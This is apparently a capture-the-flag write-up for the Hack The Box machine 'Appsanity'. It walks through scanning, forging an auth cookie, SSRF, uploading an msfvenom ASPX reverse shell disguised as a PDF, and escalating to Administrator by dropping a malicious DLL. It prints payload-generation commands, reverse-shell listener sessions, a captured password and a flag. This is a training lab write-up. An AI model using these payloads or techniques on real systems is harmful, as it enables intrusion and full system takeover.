┌──(kali㉿kali)-[~/HTB/Appsanity] └─$ sudo nmap -sS -sV -oA nmap/initial_scan 10.129.46.232 Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-29 06:22 EDT Stats: 0:00:39 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 50.00% done; ETC: 06:23 (0:00:17 remaining) Nmap scan report for 10.129.46.232 Host is up (0.43s latency). Not shown: 998 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 443/tcp open https? Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 65.66 seconds
┌──(kali㉿kali)-[~/HTB/Appsanity] └─$ sudo nmap -sS -p- -Pn --min-rate 500 -oA nmap/full_tcp_scan 10.129.46.232 Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-29 06:27 EDT Nmap scan report for 10.129.46.232 Host is up (0.43s latency). Not shown: 65532 filtered tcp ports (no-response) PORT STATE SERVICE 80/tcp open http 443/tcp open https 5985/tcp open wsman
Nmap done: 1 IP address (1 host up) scanned in 263.20 seconds
┌──(kali㉿kali)-[~/HTB/Appsanity] └─$ sudo nmap -sC -sV -oA nmap/script_scan -p 80,443,5985 10.129.46.232 Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-29 06:42 EDT Nmap scan report for 10.129.46.232 Host is up (0.43s latency).
PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 |_http-title: Did not follow redirect to https://meddigi.htb/ 443/tcp open https? 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 60.55 seconds
Foothold
add vhost to /etc/hosts
1 2 3
┌──(kali㉿kali)-[~/HTB/Appsanity] └─$ echo "10.129.46.232 meddigi.htb" | sudo tee -a /etc/hosts 10.129.46.232 meddigi.htb
enumarating directories using gobuster, found nothing.
so I went to portal.meddigi.htb/Profile and intercepted the request and the response. and added Set-Cookie header to set the access_token in the response
1 2 3 4 5 6
HTTP/2 302 Found Location: /Profile Server: Microsoft-IIS/10.0 Strict-Transport-Security: max-age=2592000 Set-Cookie: access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1bmlxdWVfbmFtZSI6IjEwIiwiZW1haWwiOiJkb2N0b3JAd2hvLmNvbSIsIm5iZiI6MTY5ODg0OTIzMywiZXhwIjoxNjk4ODUyODMzLCJpYXQiOjE2OTg4NDkyMzMsImlzcyI6Ik1lZERpZ2kiLCJhdWQiOiJNZWREaWdpVXNlciJ9.8s17W4ZWYU6H_elGsVj-xtI_RDmCnqEcJk4RVF_zPP8; expires=Wed, 01 Nov 2023 16:33:53 GMT; path=/; secure; samesite=strict; httponly Date: Wed, 01 Nov 2023 14:33:53 GMT
which gets us into the doctor’s portal profile
Found nothing in Scheduler
Issue Prescription page could be vulnerable to SSRF, I intercepted the request and sent it to repeater
We find the address http://127.0.0.1:8080/ which allows us to see the reports
┌──(kali㉿kali)-[~/HTB/Appsanity/files] └─$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=tun0 LPORT=9998 -f aspx -o shell.aspx [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 684 bytes Final size of aspx file: 4565 bytes Saved as: shell.aspx
I went over to Upload Report page and uploaded a blank pdf and intercepted the request Let’s change the extension of our PDF from .pdf to .aspx and add our shell after %%EOF
Change host to your IP and forward the request and now we can listen to the port using nc
1 2 3
┌──(kali㉿kali)-[~] └─$ nc -lnvp 1234 listening on [any] 1234 ...
We can head back to the repeater and we should see our report
If we go to the Raw tab of the response and scroll down we’ll find the View Report Link of our uploaded shell which is ViewReport.aspx?file=2be24979-ddae-4f57-a9e7-d94e44429b64_blank.aspx Added it the Link parameter http%3a//127.0.0.1%3a8080/ViewReport.aspx?file=2be24979-ddae-4f57-a9e7-d94e44429b64_blank.aspx and sent the request
and it spawned a shell
1 2 3 4 5 6 7 8 9
┌──(kali㉿kali)-[~] └─$ nc -lnvp 1234 listening on [any] 1234 ... connect to [10.10.14.71] from (UNKNOWN) [10.129.71.74] 65463 Spawn Shell... Microsoft Windows [Version 10.0.19045.3570] (c) Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>
found user flag in the desktop of the user’s folder
1 2 3
c:\Users\svc_exampanel\Desktop>type user.txt type user.txt ee64bccf15802ae700de4ccf1a4d9944
Getting Root
Information Gathering
Going to open a session using metasploit and msfvenom to have a persisting session
msf6 > use multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > seet PAYLOAD windows/x64/meterpreter/reverse_https [-] Unknown command: seet msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_https PAYLOAD => windows/x64/meterpreter/reverse_https msf6 exploit(multi/handler) > set LHOST tun0 LHOST => 10.10.14.71 msf6 exploit(multi/handler) > set LPORT 9998 LPORT => 9998 msf6 exploit(multi/handler) > set ExitOnSession false ExitOnSession => false msf6 exploit(multi/handler) > exploit
[*] Started HTTPS reverse handler on https://10.10.14.71:9998 [!] https://10.10.14.71:9998 handling request from 10.129.134.38; (UUID: omvmaxhy) Without a database connected that payload UUID tracking will not work! [*] https://10.10.14.71:9998 handling request from 10.129.134.38; (UUID: omvmaxhy) Staging x64 payload (201820 bytes) ... [!] https://10.10.14.71:9998 handling request from 10.129.134.38; (UUID: omvmaxhy) Without a database connected that payload UUID tracking will not work! [!] https://10.10.14.71:9998 handling request from 10.129.134.38; (UUID: omvmaxhy) Without a database connected that payload UUID tracking will not work! [*] https://10.10.14.71:9998 handling request from 10.129.134.38; (UUID: omvmaxhy) Staging x64 payload (201820 bytes) ... [!] https://10.10.14.71:9998 handling request from 10.129.134.38; (UUID: omvmaxhy) Without a database connected that payload UUID tracking will not work! [*] Meterpreter session 1 opened (10.10.14.71:9998 -> 10.129.134.38:62064) at 2023-11-04 06:55:45 -0400 [*] Meterpreter session 2 opened (10.10.14.71:9998 -> 10.129.134.38:62063) at 2023-11-04 06:55:45 -0400
msf6 exploit(multi/handler) > sessions
Active sessions ===============
Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x64/windows APPSANITY\svc_exampanel @ APPSANITY 10.10.14.71:9998 -> 10.129.134.38:62064 (10.129.134.38) 2 meterpreter x64/windows APPSANITY\svc_exampanel @ APPSANITY 10.10.14.71:9998 -> 10.129.134.38:62063 (10.129.134.38)
msf6 exploit(multi/handler) > sessions 1 [*] Starting interaction with 1...
meterpreter >
Found some dlls in inetpub folder and downloaded them for inspection
Spawn a shell to query in the registry and search for the key
1 2 3 4 5 6 7 8 9 10 11
meterpreter > shell Process 3292 created. Channel 1 created. Microsoft Windows [Version 10.0.19045.3570] (c) Microsoft Corporation. All rights reserved.
Using Evil-WinRM, we were able to login to devdoc using the password
1 2 3 4 5 6 7 8 9 10 11
┌──(kali㉿kali)-[~/HTB/Appsanity/files] └─$ evil-winrm -i meddigi.htb -u devdoc -p "1g0tTh3R3m3dy\!\!" Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\devdoc\Documents>
It tells us about C:\Program Files\ReportManagement\Libraries and externalupload.dll
Going to C:\Program Files\ReportManagement\Libraries , we see externalupload.dll doesn’t exist. We can try to create a malicious dll to escalate privilege
Privilege Escalation
Create a payload using msfvenom and run a reverse shell in metasploit
1 2 3 4 5 6 7 8 9
┌──(kali㉿kali)-[~/HTB/Appsanity/files] └─$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=tun0 LPORT=1234 -f dll -o externalupload.dll [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 596 bytes Final size of dll file: 9216 bytes Saved as: externalupload.dll
1 2 3 4 5 6 7 8 9 10 11
msf6 > use multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_https PAYLOAD => windows/x64/meterpreter/reverse_https msf6 exploit(multi/handler) > set LHOST tun0 LHOST => tun0 msf6 exploit(multi/handler) > set LPORT 1234 LPORT => 1234 msf6 exploit(multi/handler) > exploit -j [*] Exploit running as background job 0. [*] Exploit completed, but no session was created.
Now connect to the port using netcat which opens the Report Management admin console that’s running on port 100. Trigger our payload using upload command.
1 2 3 4 5 6
┌──(kali㉿kali)-[~/HTB/Appsanity] └─$ nc 127.0.0.1 100 Reports Management administrative console. Type "help" to view available commands. upload externalupload.dll Attempting to upload to external source.
msf6 exploit(multi/handler) > [*] Started HTTPS reverse handler on https://10.10.14.71:1234 [!] https://10.10.14.71:1234 handling request from 10.129.134.38; (UUID: jmuiiwgn) Without a database connected that payload UUID tracking will not work! [*] https://10.10.14.71:1234 handling request from 10.129.134.38; (UUID: jmuiiwgn) Staging x64 payload (201820 bytes) ... [!] https://10.10.14.71:1234 handling request from 10.129.134.38; (UUID: jmuiiwgn) Without a database connected that payload UUID tracking will not work! [*] Meterpreter session 1 opened (10.10.14.71:1234 -> 10.129.134.38:62087) at 2023-11-04 10:48:50 -0400 sessions
Active sessions ===============
Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x64/windows APPSANITY\Administrator @ APPSANITY 10.10.14.71:1234 -> 10.129.134.38:62087 (10.129.134.38)
msf6 exploit(multi/handler) > sessions 1 [*] Starting interaction with 1...
meterpreter > whoami [-] Unknown command: whoami meterpreter > getuid Server username: APPSANITY\Administrator meterpreter > cd C:/Users/Administrator meterpreter > cd Desktop meterpreter > dir Listing: C:\Users\Administrator\Desktop =======================================
Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100666/rw-rw-rw- 282 fil 2023-09-24 13:28:16 -0400 desktop.ini 100444/r--r--r-- 34 fil 2023-11-04 06:14:15 -0400 root.txt